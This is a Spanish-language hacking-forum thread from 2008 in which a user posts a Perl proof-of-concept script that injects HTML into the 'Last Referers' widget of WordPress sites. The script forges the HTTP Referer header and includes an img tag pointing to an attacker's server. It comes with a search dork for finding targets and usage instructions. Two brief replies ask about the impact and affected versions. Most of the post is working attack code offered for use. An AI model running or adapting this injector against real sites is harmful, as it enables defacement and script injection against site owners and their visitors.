elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  WordPress Last Referers HTML INJECTION Proof of Concept
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: WordPress Last Referers HTML INJECTION Proof of Concept  (Leído 18,753 veces)
ZoneMx

Desconectado Desconectado

Mensajes: 1


Ver Perfil
WordPress Last Referers HTML INJECTION Proof of Concept
« en: 23 Enero 2008, 07:08 am »

Saludos pues aqui les dejo esto lo he estado probando y funciona
codigo en perl, sigo investigando.... ;D

Código:
#/usr/bin/perl
#zONEm mXC gEN
#perl test to insert html code to WordPress Last referers
#Worpress: Dork:Is proudly powered by Wordpress last referers
#test with http://nerra.com/broadsword/

use strict;
use warnings;
use LWP;

my $wordweb=shift or help();
my $agente = LWP::UserAgent->new;
my $request = HTTP::Request->new(GET => $wordweb);
my ($response,$referer);

banner();
        $referer="  '<img src='http://youserver/yourimage.png'>";
        $request->referer($referer);
        $response=$agente->request($request);
        $response->is_success or die "$wordweb : ",$response->message,"\n";
        $referer="  zoneM MxC hack you..";
        $request->referer($referer);
        $response=$agente->request($request);
        $response->is_success or die "$wordweb : ",$response->message,"\n";
        print "\nAhora se debe ver la imagen insertada en  Last Referers\n";
        print "\nMxC Gen Test\n";
sub banner{
        print "test to INJECT html code to Last Referers in Wordpress";
     
}
sub help{
        print "HTML LAST REFERERS WORDPRESS INJECTOR\n";
        print "PROOF OF CONCEPT\n";
     
        print "Proof by: ZoneM MxC Gen\n\n";
        print "UsO:\n";
        print "\tperl injeccion.pl [url]\n";
        print "\t[url]-WordPress Site \n";
        print "Example:\n";
        print "\tperl injeccion.pl http://sitiowordpress.org/\n";
        exit(0);
}
En línea

-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: WordPress Last Referers HTML INJECTION Proof of Concept
« Respuesta #1 en: 26 Enero 2008, 14:28 pm »

Por lo que veo en el code, si no me equivoco , el código que inyectas en la web del wordpress es clientside, ¿no?...

salu2
En línea

6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
Re: WordPress Last Referers HTML INJECTION Proof of Concept
« Respuesta #2 en: 28 Enero 2008, 14:37 pm »

la verdad que si funciona!..pero que version? más datos exactamente.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
PoC Proof-of-Concept - Ping de la Muerte | BSOD exploit for CVE-2020-16898 | Windows TCP/IPv6
Bugs y Exploits
el-brujo 1 3,063 Último mensaje 19 Enero 2021, 13:19 pm
por Usuario887
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines